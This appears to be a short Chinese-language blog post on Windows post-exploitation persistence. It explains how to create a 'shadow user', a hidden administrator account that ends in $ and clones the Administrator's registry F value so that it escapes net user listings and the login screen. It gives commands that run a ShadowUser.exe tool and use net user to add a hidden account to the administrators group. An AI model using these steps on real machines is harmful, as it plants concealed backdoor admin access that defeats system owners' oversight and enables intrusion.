0x00 前提

水一篇内网东西,主要针对一种情况:抓到 hash 解不开, 又不想 pth, 就想直接登桌面

0x01权限维持-影子用户后门

影子账户,古老但有效!

原理

代 $ 符号的用户名不会显示出来,仔通导出注册表,并修改F值,克隆账号,再删除账号

效果

  1. net user无法删除,需要删除注册表相关键值;
  2. Windows 的登录界面不显示该用户信息。

0x02 简单实用

1
ShadowUser.exe admin administrator

image-20211012213802322

可以正常登录,桌面什么也是克隆的administrator的

image-20211012214104249

单纯的创建隐藏用户

我们先利用命令创建一个隐藏用户,并将其加入本地管理员组。

1
2
net user test$ Test123456 /add
net localgroup administrators test$ /add